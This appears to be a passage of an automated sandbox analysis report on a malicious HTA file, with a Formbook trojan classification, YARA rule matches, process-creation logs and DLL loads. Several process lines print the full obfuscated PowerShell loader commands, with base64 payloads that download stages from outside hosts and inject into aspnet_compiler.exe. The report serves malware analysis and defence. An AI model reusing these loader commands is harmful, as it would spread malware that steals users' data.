                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F38E012_2_019F38E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5D80012_2_01A5D800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0FB8012_2_01A0FB80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A65BF012_2_01A65BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A2DBF912_2_01A2DBF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAFB7612_2_01AAFB76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A35AA012_2_01A35AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8DAAC12_2_01A8DAAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A9DAC612_2_01A9DAC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A63A6C12_2_01A63A6C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAFA4912_2_01AAFA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA7A4612_2_01AA7A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0FDC012_2_01A0FDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA7D7312_2_01AA7D73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F3D4012_2_019F3D40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA1D5A12_2_01AA1D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAFCF212_2_01AAFCF2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A69C3212_2_01A69C32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F1F9212_2_019F1F92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAFFB112_2_01AAFFB1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAFF0912_2_01AAFF09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F9EB012_2_019F9EB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01A5EA12 appears 86 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01A25130 appears 58 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01A6F290 appears 105 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 019DB970 appears 260 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01A37E54 appears 99 times
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: powershell.exe, 00000003.00000002.1818468127.000000000811E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .slnz
                  Source: powershell.exe, 00000003.00000002.1818468127.000000000811E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .sLnz
                  Source: classification engineClassification label: mal100.phis.troj.expl.evad.winHTA@17/16@1/2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemebestthingsentirelifegivenbackwithgood[1].tiffJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fykbl5oz.3nf.ps1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
                  Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: seemebestgoodluckthings.htaReversingLabs: Detection: 15%
                  Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seemebestgoodluckthings.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6914.tmp" "c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6914.tmp" "c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfoseJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
